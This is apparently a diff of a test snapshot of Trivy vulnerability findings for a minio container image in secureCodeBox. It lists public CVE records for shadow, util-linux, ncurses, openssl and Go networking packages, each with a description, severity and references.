"https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "mount", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "ncurses-base", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", + ], + }, + "category": "Vulnerability", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "ncurses: segfaulting OOB read", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "ncurses-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", ], }, "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "request smuggling", + "name": "Local users can trigger security-relevant memory corruption via malformed data", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", - ], - }, - "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "double free after calling PEM_read_bio_ex", + "references": [ { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + 